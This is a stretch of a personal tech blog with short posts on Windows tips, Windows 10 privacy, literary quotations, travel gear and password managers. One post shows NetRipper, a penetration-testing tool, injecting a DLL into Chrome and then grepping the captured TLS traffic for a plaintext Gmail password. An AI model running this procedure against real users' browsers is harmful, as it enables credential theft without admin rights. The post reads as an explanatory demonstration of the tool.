tinyapps.org / blog


Change the Windows 7 interface language #

Vistalizator is a portable app that helps you change the display language in any version of Windows Vista or 7 (inexplicably, Microsoft normally restricts this ability to Ultimate or Enterprise editions). Links to necessary MUI (Multilingual User Interface) files hosted at Microsoft and steps for creating a multi-language Windows DVD are also provided.

/windows | Aug 25, 2015

Sniffing encrypted traffic #

Fiddler Screenshot ("The free web debugging proxy for any browser, system or platform") has long been used for sniffing encrypted web traffic, but it requires full administrator access to install an untrusted root certificate for decryption to work (Tools > Fiddler Options... > HTTPS > etc) and the .NET Framework to run.

NetRipper ("Smart traffic sniffing for penetration testers") requires neither. It is "a post exploitation tool targeting Windows systems which uses API hooking in order to intercept network traffic and encryption related functions from a low privileged user, being able to capture both plain-text traffic and encrypted traffic before encryption/after decryption." Further, "NetRipper should be able to capture network traffic from: Putty, WinSCP, SQL Server Management Studio, Lync (Skype for Business), Microsoft Outlook, Google Chrome, Mozilla Firefox. The list is not limited to these applications but other tools may require special support."

Here's a simple example of it in action:
  1. Launch Google Chrome
  2. Open cmd.exe (no need for elevated command prompt), cd to the NetRipper directory and run:
    C:\Release>NetRipper.exe DLL.dll chrome.exe
    Trying to inject DLL.dll in chrome.exe
    Reflective injected in: 2880
    Reflective injected in: 2992
    Reflective injected in: 3096
  3. Login to GMail account in Chrome
  4. NetRipper saves data to %temp%\NetRipper by default (on most systems, this will be C:\Users\username\AppData\Local\Temp\NetRipper):
    C:\Release>dir %temp%\NetRipper /B
    2880_chrome.exe_recv.txt
    2880_chrome.exe_SSL_Read.txt
    2880_chrome.exe_SSL_Write.txt
    2880_chrome.exe_StringFinder.txt
    2880_chrome.exe_WSASend.txt
    NetRipperLog.txt
  5. Search for the string "Passwd":
    C:\Release>findstr Passwd %temp%\NetRipper\2880_chrome.exe_SSL_Write.txt
    ...Email=tinyapps%40gmail.com&Passwd=PASSWORD_IN_PLAIN_TEXT_SHOWN_HERE&PersistentCookie=yes&signIn=...
Fiddler: NetRipper:

/windows | Aug 15, 2015

Migrating email from Windows Live Mail (eml) to Apple Mail (mbox) #

  1. Install Thunderbird
  2. Open Thunderbird and cancel the automatic setup
  3. Install ImportExportTools
  4. File > Offline > Work Offline
  5. Tools > Account Settings > Account Actions > Add Mail Account... > enter any name, address, and password > Continue > Advanced config > OK
  6. Select the Inbox folder in the left-hand pane
  7. Tools > ImportExportTools > Import all messages from a directory > also from its subdirectories > browse to Windows Live Mail top folder (e.g., C:\Users\user\AppData\Local\Microsoft\Windows Live Mail) > Select Folder
  8. The import process will begin and progress will be displayed in the status bar at bottom
  9. Tools > ImportExportTools > Options > Export directories > check "Export folders as MBOX file" and select a destination directory > OK
  10. Select the desired top mail folder in Thunderbird
  11. Tools > ImportExportTools > Export folder with subfolders (with structure)
  12. The export process will begin. Unlike the import process, progress is not displayed.
  13. When the export is complete, copy the exported data to the Mac and import into Mail (File > Import Mailboxes... > Thunderbird > etc.)
Related:

/windows | Aug 12, 2015

"Desire, at the end, was a malady" #

Desire, at the end, was a malady, or a madness, or both. I grew careless of the lives of others. I took pleasure where it pleased me, and passed on. I forgot that every little action of the common day makes or unmakes character, and that therefore what one has done in the secret chamber one has some day to cry aloud on the housetop. I ceased to be lord over myself. I was no longer the captain of my soul, and did not know it. I allowed pleasure to dominate me. I ended in horrible disgrace. There is only one thing for me now, absolute humility.

. . .

I said . . . that there was enough suffering in one narrow London lane to show that God did not love man, and that wherever there was any sorrow, though but that of a child, in some little garden weeping over a fault that it had or had not committed, the whole face of creation was completely marred. I was entirely wrong. . . . Now it seems to me that love of some kind is the only possible explanation of the extraordinary amount of suffering that there is in the world. I cannot conceive of any other explanation. I am convinced that there is no other, and that if the world has indeed, as I have said, been built of sorrow, it has been built by the hands of love, because in no other way could the soul of man, for whom the world was made, reach the full stature of its perfection.
From De Profundis by Oscar Wilde

/misc | Aug 07, 2015

"Pleasure passes, but dishonor remains." #

When I was still a boy at school, I heard that this Greek saying, which I here set down, was uttered by Musonius the philosopher, and because the sentiment is true and striking as well as neatly and concisely rounded out, I was very happy to commit it to memory. "If one accomplishes some good though with toil, the toil passes, but the good remains; if one does something dishonorable with pleasure, the pleasure passes, but the dishonor remains."

Afterwards I read that same sentiment in a speech of Cato's which was delivered at Numantia to the knights. Although it is expressed a little less compactly and concisely as compared with the Greek which I have quoted, yet because it is earlier and more ancient, it may well seem more impressive. The words from his speech are the following: "Consider this in your hearts: if you accomplish some good attended with toil, the toil will quickly leave you; but if you do some evil attended with pleasure, the pleasure will quickly pass away, but the bad deed will remain with you always."
From Musonius Rufus: The Roman Socrates by Cora E. Lutz. Printed in Yale Classical Studies, Volume X (1947). Electronic text can be found here and here.

/misc | Aug 03, 2015

Windows 10: Privacy nightmare #

July 29 - the big Windows 10 release day. Rather than trying an unreliable workaround that was making the rounds, I followed RiotShielder's advice and downloaded an ISO from Microsoft, installing over a Windows 8.1 virtual machine (because you must upgrade your existing Windows OS to get a valid Windows 10 key before doing a clean install (recover the key with Nir's ProduKey)).

When installation completes, be sure to click the tiny "Customize" link on the "Get going fast" screen; you may (not) be surprised at how invasive Microsoft has become. Here's a taste (these are all enabled by default):

  1. "Personalize your speech, typing, and inking input by sending contacts and calendar details, along with other associated input data to Microsoft."
  2. "Send typing and inking data to Microsoft to improve the recognition and suggestion platform."
  3. "Use pge prediction to improve reading, speed up browsing, and make your overall experience better in Windows browsers. Your browsing data will be sent to Microsoft."
  4. "Automatically connect to suggested open hotspots. Not all networks are secure."
  5. "Automatically connect to networks shared by your contacts."
  6. "Send error and diagnostic information to Microsoft." (The toggle switch to enable or disable was hidden below the screen; a near-invisible scroll bar was required to view it.)

Number five apparently refers to Wi-Fi (Non)Sense, which Claus covered in some detail.

Much more about the mounting privacy problems in Windows 10 from Heini Järvinen:

By default, when signing into Windows with a Microsoft account, Windows syncs some of your settings and data with Microsoft servers, for example "web browser history, favorites, and websites you have open" as well as "saved app, website, mobile hotspot, and Wi-Fi network names and passwords". Users can however deactivate this transfer to the Microsoft servers by changing their settings.

More problematic from a data protection perspective is however the fact that Windows generates a unique advertising ID for each user on a device. This advertising ID can be used by third parties, such as app developers and advertising networks for profiling purposes.

Also, when device encryption is on, Windows automatically encrypts the drive Windows is installed on and generates a recovery key. The BitLocker recovery key for the user’s device is automatically backed up online in the Microsoft OneDrive account.

Microsoft’s updated terms also state that they collect basic information "from you and your devices, including for example "app use data for apps that run on Windows" and "data about the networks you connect to."

Users who chose to enable Microsoft’s personal assistant software "Cortana" have to live with the following invasion to their privacy: "To enable Cortana to provide personalized experiences and relevant suggestions, Microsoft collects and uses various types of data, such as your device location, data from your calendar, the apps you use, data from your emails and text messages, who you call, your contacts and how often you interact with them on your device. Cortana also learns about you by collecting data about how you use your device and other Microsoft services, such as your music, alarm settings, whether the lock screen is on, what you view and purchase, your browse and Bing search history, and more." But this is not all, as this piece of software also analyses undefined "speech data": "we collect your voice input, as well your name and nickname, your recent calendar events and the names of the people in your appointments, and information about your contacts including names and nicknames."

But Microsoft’s updated privacy policy is not only bad news for privacy. Your free speech rights can also be violated on an ad hoc basis as the company warns:

"We will access, disclose and preserve personal data, including your content (such as the content of your emails, other private communications or files in private folders), when we have a good faith belief that doing so is necessary to", for example, "protect their customers" or "enforce the terms governing the use of the services".

At the very least, be sure to create a local account and customize the privacy settings after installation. Better yet, migrate to a truly free operating system; Richard Stallman was right all along.

/windows | Jul 29, 2015

"What else do _you_ do?" #

ZAPHOD BEEBLEBROX: . . . [W]hat's your name?
MAN: I don't know. Why, do you think I ought to have one? It seems odd to give a bundle of vague sensory perceptions a name.
ZARNIWOOP: Listen. We must ask you some questions.
. . .
ZARNIWOOP: How long have you been ruling the Universe?
MAN: Ah, this is a question about the past is it?
ZARNIWOOP: Yes.
MAN: How can I tell that the past isn't a fiction designed to account for the discrepancy between my immediate physical sensations and my state of mind?
ZARNIWOOP: Do you answer all questions like this?
MAN: I say what it occurs to me to say when I think I hear people say things. More I cannot say.
. . .
ZARNIWOOP: People come to you, yes?
MAN: I think so.
ZARNIWOOP: And they ask you to take decisions—about wars, about economies, about people, about everything going on out there in the Universe?
MAN: I only decide about my Universe. My Universe is what happens to my eyes and ears. Anything else is surmise and hearsay. For all I know, these people may not exist. You may not exist. I say what it occurs to me to say.
ZARNIWOOP: But don't you see? What you decide affects the fate of millions of people.
MAN: I don't know them, I've never met them. They only exist in words I think I hear.
. . .
MAN: But it's folly to say you know what is happening to other people. Only they know. If they exist.
ZARNIWOOP: Do you think they do?
MAN: I have no opinion. How can I have?
. . .
ZARNIWOOP: But don't you see that people live or die on your word?
MAN: It's nothing to do with me, I am not involved with people. The Lord knows I am not a cruel man.
ZARNIWOOP: Ah! You say... the Lord! So, you believe in...
MAN: My cat. I call him the Lord. I am kind to him.
ZARNIWOOP: All right. How do you know he exists? How do you know he knows you to be kind, or enjoys what you think of as your kindness?
MAN: I don't. I have no idea. It merely pleases me to behave in a certain way to what appears to be a cat. What else do you do? . . .

Listen

From Douglas Adams' The Hitchhiker's Guide to the Galaxy: Secondary Phase (Original BBC Radio Series). See also The Original Hitchhiker Radio Scripts: 10th Anniversary Edition and The Hitchhiker's Guide To The Galaxy: The Complete Radio Series.

/misc | Jul 19, 2015

Download Flash videos #

(including those embedded in JW Player) with the Grab Any Media extension for Google Chrome. Installation and usage instructions. Piracy PSA.

/misc | Jul 17, 2015

Air travel essentials for long flights #

ItemPurposeRatingComment
Bose QuietComfort 20i Acoustic Noise Cancelling HeadphonesAvoid noise fatigue+++++Next to water, the single most important in-flight item in my opinion.
Flight SprayAvoid dry nose++++Much more effective than the damp washcloth I used formerly.
No-Jet-Lag"For the relief of tiredness and jet lag associated with flying"?Despite taking as directed, not really sure if this had any effect, though there are plenty of positive reviews on Amazon.
Source Naturals NADH 20mg"Helps relieve drowsiness and restores alertness and energy"++++Definitely seemed to help keep me awake when needed.
Herbatonin 3mg Plant Melatonin"Helps support normal sleep patterns when disrupted by travel and changing time zones"++++Definitely seemed to help get me to sleep when needed.
Vitalsox Graduated Compression SocksPossibly help prevent Deep Vein Thrombosis and Pulmonary Embolism?Did not really feel any difference, but also did not develp DVT (not that I ever have).
Memory Foam Neck PillowDoze in relative comfort-Despite hours of research (and a slew of positive reviews on Amazon), this did not work for me at all - gave away after landing. The vast majority of reviews are overwhelmingly positive, however.
WaterAvoid dehydration (and in-flight meals)+++++A must.

/misc | Jun 26, 2015

Time to replace traditional password managers like KeePass, 1Password, LastPass, et.al.? #

"Master Password is a stateless password generator. It doesn't store, collect or transmit any secrets. It makes them ubiquitously available, on-demand, depends on nothing but your private master password, and is fully open source.

How Does It Work?

The user is expected to remember the following information:

In practice, the secret master password is the only extra thing users will actually need to remember. Their full name, they'll hopefully remember regardless. If the site is always named after the bare domain name, it needn't explicitly be remembered but can be found in the browser's address bar. The counter and type need only be remembered if they are changed from their default values."

/misc | Jun 26, 2015


Subscribe or visit the archives